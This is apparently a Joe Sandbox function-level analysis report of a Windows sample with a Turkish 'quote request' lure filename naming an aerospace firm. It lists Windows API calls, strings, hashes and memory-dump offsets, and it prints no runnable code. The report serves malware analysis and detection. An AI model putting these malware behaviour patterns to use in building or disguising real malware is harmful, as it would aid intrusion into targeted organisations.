Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 522c962ecd33e1a52d4b9c936891499dbfd8b8221a8636e994aa06534cef5903
Instruction ID: 25cb0deca085d5360960f5f8d77f6aaaa51499e2af06e55e78d9299f9dcf5f2c
Opcode Fuzzy Hash: 522c962ecd33e1a52d4b9c936891499dbfd8b8221a8636e994aa06534cef5903
Instruction Fuzzy Hash: 86E0ED3A484211BBD7016FA1FD0C985BF39FF69721720C220F22981070CF725421DF90

Function 0018BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0018BEB3

Strings

D%%D%%, xrefs: 0018BCA5
D%%, xrefs: 0018BE9A
D%%, xrefs: 0018BCA2
D%%, xrefs: 0018BDED, 0018BD91, 0018BD1B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%%$D%%$D%%$D%%D%%
API String ID: 1385522511-676076623
Opcode ID: 65ef531cbba3048c8123de59afe0df073b90f53c0de03c22e167688c3849934f
Instruction ID: e6fc7cf53b8f650e410de3893ed5fad7912119a22bacf50d1c37b2a1b71260b7
Opcode Fuzzy Hash: 65ef531cbba3048c8123de59afe0df073b90f53c0de03c22e167688c3849934f
Instruction Fuzzy Hash: 87913A75A0820ADFCB18DF98C0D06AAB7F1FF59314F64416AD945AB351E731AE81CF90

Function 001EC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00187620: _wcslen.LIBCMT ref: 00187625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001EC6EE
_wcslen.LIBCMT ref: 001EC735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001EC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001EC7CA

Strings

0, xrefs: 001EC6AF

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 7c41b615054fa75fd117c9c5a1b9faeb0555d2951ba64fd803adf2eb8a044fba
Instruction ID: 811962844adf31011f452041724ed57b7b97a49fd701813bfe6ff4c6f6d879b1
Opcode Fuzzy Hash: 7c41b615054fa75fd117c9c5a1b9faeb0555d2951ba64fd803adf2eb8a044fba
Instruction Fuzzy Hash: EE51F272A047819BD7149F2ACC85BAFB7E4AF5A310F04092DF991D3290DB70DD46CB92

Function 0020AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0020AEA3

Part of subcall function 00187620: _wcslen.LIBCMT ref: 00187625

GetProcessId.KERNEL32(00000000), ref: 0020AF38
CloseHandle.KERNEL32(00000000), ref: 0020AF67

Strings

<, xrefs: 0020AE6B
@, xrefs: 0020AE72

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 060496c6fe69b0da8b8c98d94a4b8b56a9d11477a53dcca4acd32c14bbdbbdc9
Instruction ID: 717195bd68044981637d35a90a319c9411b3d35c80e63ed2746cf9e4aacbfad1
Opcode Fuzzy Hash: 060496c6fe69b0da8b8c98d94a4b8b56a9d11477a53dcca4acd32c14bbdbbdc9
Instruction Fuzzy Hash: 17715575A10719DFCB14EF54D484A9EBBF0BF08304F5484A9E816AB692CB71EE41CFA1

Function 001E719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001E7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001E723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001E724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001E72CF

Strings

DllGetClassObject, xrefs: 001E7242

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: a82c770ac99c94b638bbe03974d64e65b168816c030980e8fae3dedbf873e51e
Instruction ID: 2e0a344ada61b976f6a86653d06f867b57229c84291ae9b7097c056b490f2641
Opcode Fuzzy Hash: a82c770ac99c94b638bbe03974d64e65b168816c030980e8fae3dedbf873e51e
Instruction Fuzzy Hash: 1341B671604646EFEB15CF55C884A9E7BB9EF54310F1580ADBE059F28AD7B0DD40CBA0

Function 00212F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00212F8D
LoadLibraryW.KERNEL32(?), ref: 00212F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00212FA9
DestroyWindow.USER32(?), ref: 00212FB1

Strings

SysAnimate32, xrefs: 00212F68

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 6a52cd59a31b010770809858e8e83968d0d44b6e320b727a44476a92dcef0639
Instruction ID: 528a4c7d98de328526719fc4fecc57f87cfb0664a7e536528fa71016bf795e31
Opcode Fuzzy Hash: 6a52cd59a31b010770809858e8e83968d0d44b6e320b727a44476a92dcef0639
Instruction Fuzzy Hash: 4D21887122020AEBEB204E64AC84EFB37F9EB69364F104218F95092590D771DCB69B60

Function 001A4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001A4D1E,001B28E9,?,001A4CBE,001B28E9,002488B8,0000000C,001A4E15,001B28E9,00000002), ref: 001A4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001A4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,001A4D1E,001B28E9,?,001A4CBE,001B28E9,002488B8,0000000C,001A4E15,001B28E9,00000002,00000000), ref: 001A4DC3

Strings

mscoree.dll, xrefs: 001A4D86
CorExitProcess, xrefs: 001A4D98

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f60f570e2fb159768d5bf60a66e0100d48d634710b392e0b068983b26d07465
Instruction ID: 1b2f496822f9abaab5c60190cf2e1a7080833b9987e6c48a42660587b72db4e0
Opcode Fuzzy Hash: 0f60f570e2fb159768d5bf60a66e0100d48d634710b392e0b068983b26d07465
Instruction Fuzzy Hash: 7BF04F39A80218BBDB159F94EC4DBEDBBB5EF65751F1040A4F809A2260CF719A50CA90

Function 001DD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 001DD3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001DD3BF
FreeLibrary.KERNEL32(00000000), ref: 001DD3E5

Strings

GetSystemWow64DirectoryW, xrefs: 001DD3B9
X64, xrefs: 001DD2A8

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 1f490e2ad8927c0704d970ed1b1b1934043ea63bd96596d377d68f7c883679ac
Instruction ID: 0f1930258f7716edec147c4bcddc9f319dcf37f40d939d914f80d159a0321ce0
Opcode Fuzzy Hash: 1f490e2ad8927c0704d970ed1b1b1934043ea63bd96596d377d68f7c883679ac
Instruction Fuzzy Hash: 04F0EC758D5611BBDB391B10BC5CDA97324BF21742B66815BF806E2214DF30CD508692

Function 00184E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00184EDD,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00184EAE
FreeLibrary.KERNEL32(00000000,?,?,00184EDD,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00184EA8
kernel32.dll, xrefs: 00184E94

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: e0cc1d52823a5851775f500b3d0eb2ca2f75842f8564ad8b92e7e8a58123cc40
Instruction ID: 8e62aad13d2188d299763c57a9403d9e9328fb16652d7566705d87d0c3dcc937
Opcode Fuzzy Hash: e0cc1d52823a5851775f500b3d0eb2ca2f75842f8564ad8b92e7e8a58123cc40
Instruction Fuzzy Hash: 40E0CD39A915236BD2312F257C1CBDF6654AF92F627154115FC04E2100DF64CE0145B4

Function 00184E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,001C3CDE,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00184E74
FreeLibrary.KERNEL32(00000000,?,?,001C3CDE,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00184E6E
kernel32.dll, xrefs: 00184E5B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 095ba3874fe4ccd8a2ab9dda823432cfc957fe7641723643210f3da46ea2b776
Instruction ID: 15860a5bac030b6b5a8124e8cd60ad2bc1d2277382785565cefd2ab18a680534
Opcode Fuzzy Hash: 095ba3874fe4ccd8a2ab9dda823432cfc957fe7641723643210f3da46ea2b776
Instruction Fuzzy Hash: 20D0C2395826226766222B247C0CDCB6A18AF86B113254110B808E2110CF24CF018AE0

Function 0020A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0020A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0020A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0020A468
CloseHandle.KERNEL32(?), ref: 0020A63D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 4db70090e9b540c475fc237446d17b3a7f792a23b83be4e39963d1b93f6e4c9f
Instruction ID: baf0dca6256909ab898a2c0d3d87b59a18793d2ec652fc343754d38896dca864
Opcode Fuzzy Hash: 4db70090e9b540c475fc237446d17b3a7f792a23b83be4e39963d1b93f6e4c9f
Instruction Fuzzy Hash: 6DA1C3716043019FD720DF28D886F2AB7E5AF54714F54885CF55A9B3D2D7B0ED408B92

Function 001BBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00223700), ref: 001BBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0025121C,000000FF,00000000,0000003F,00000000,?,?), ref: 001BBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00251270,000000FF,?,0000003F,00000000,?), ref: 001BBC36
_free.LIBCMT ref: 001BBB7F

Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0

_free.LIBCMT ref: 001BBD4B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 4cb7747babd9832c6170942e8b6bc5c5f48f11924f834419f40f5a157d07c34f
Instruction ID: 8e9f6adc81db1cbfdf2a5d3f8fa8ac38387f8c70dcdf2fd465d9947e19c452b5
Opcode Fuzzy Hash: 4cb7747babd9832c6170942e8b6bc5c5f48f11924f834419f40f5a157d07c34f
Instruction Fuzzy Hash: B151F771908219EFCB14EF69DCC5AEEBBB8EF51310F10426AE814D75A1EBB09E508B50

Function 001EE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 001EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001ECF22,?), ref: 001EDDFD

Part of subcall function 001EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001ECF22,?), ref: 001EDE16

Part of subcall function 001EE199: GetFileAttributesW.KERNEL32(?,001ECF95), ref: 001EE19A

lstrcmpiW.KERNEL32(?,?), ref: 001EE473
MoveFileW.KERNEL32(?,?), ref: 001EE4AC
_wcslen.LIBCMT ref: 001EE5EB
_wcslen.LIBCMT ref: 001EE603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 001EE650

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 90a66c4330714e14eb2d38d6044f1b0c15b9a77a2367afb9fb1b96307cbb2f83
Instruction ID: 46b77f2163c1438bcb8c6574902e1e269b4cb45aaeccf8d900f8cb14ca3ef42d
Opcode Fuzzy Hash: 90a66c4330714e14eb2d38d6044f1b0c15b9a77a2367afb9fb1b96307cbb2f83
Instruction Fuzzy Hash: 2C5173B24087859BC724EB90DC859EFB3ECAF95340F00491EF589D3191EF75A688CB66

Function 0020B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

Part of subcall function 0020C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0020B6AE,?,?), ref: 0020C9B5
Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020C9F1
Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA68
Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0020BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0020BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0020BB63
RegCloseKey.ADVAPI32(?,?), ref: 0020BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0020BBB3

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 150cfc3ff81db60b813195286f9abea5a6f83590e4ee781c466da8d3bb17a4ec
Instruction ID: 76d22e7fe8a7b5f07f354398a0a8446c227d1ae6520255ba1f989fef652cd73c
Opcode Fuzzy Hash: 150cfc3ff81db60b813195286f9abea5a6f83590e4ee781c466da8d3bb17a4ec
Instruction Fuzzy Hash: 05619D31218342AFD725DF24C490E2ABBE5FF84308F54895DF4998B2A2DB31ED45CB92

Function 001E8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001E8BCD
VariantClear.OLEAUT32 ref: 001E8C3E
VariantClear.OLEAUT32 ref: 001E8C9D
VariantClear.OLEAUT32(?), ref: 001E8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001E8D3B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: cc438dde0cd20b0b3147bf57237573204b1fb0cb56ebc0b407ce485cfe0d41cd
Instruction ID: 8d460379165f580d0d1bb06a50f6a619d0583aef4b8a5f9d95b67d70262a2a29
Opcode Fuzzy Hash: cc438dde0cd20b0b3147bf57237573204b1fb0cb56ebc0b407ce485cfe0d41cd
Instruction Fuzzy Hash: A7518AB5A00619EFCB14CF69C884AEAB7F9FF89310B118559E909DB350EB30E911CF90

Function 001F8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001F8BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 001F8BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001F8C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001F8C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001F8C5F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: b000677a0160fd03957a0ee03a280a8f23ef1974e60804d942f90216392d8c82
Instruction ID: 5f0a51600f05509e1a00edc5314abd8f1fe945082f2d6a50ac7370a3ed0582d3
Opcode Fuzzy Hash: b000677a0160fd03957a0ee03a280a8f23ef1974e60804d942f90216392d8c82
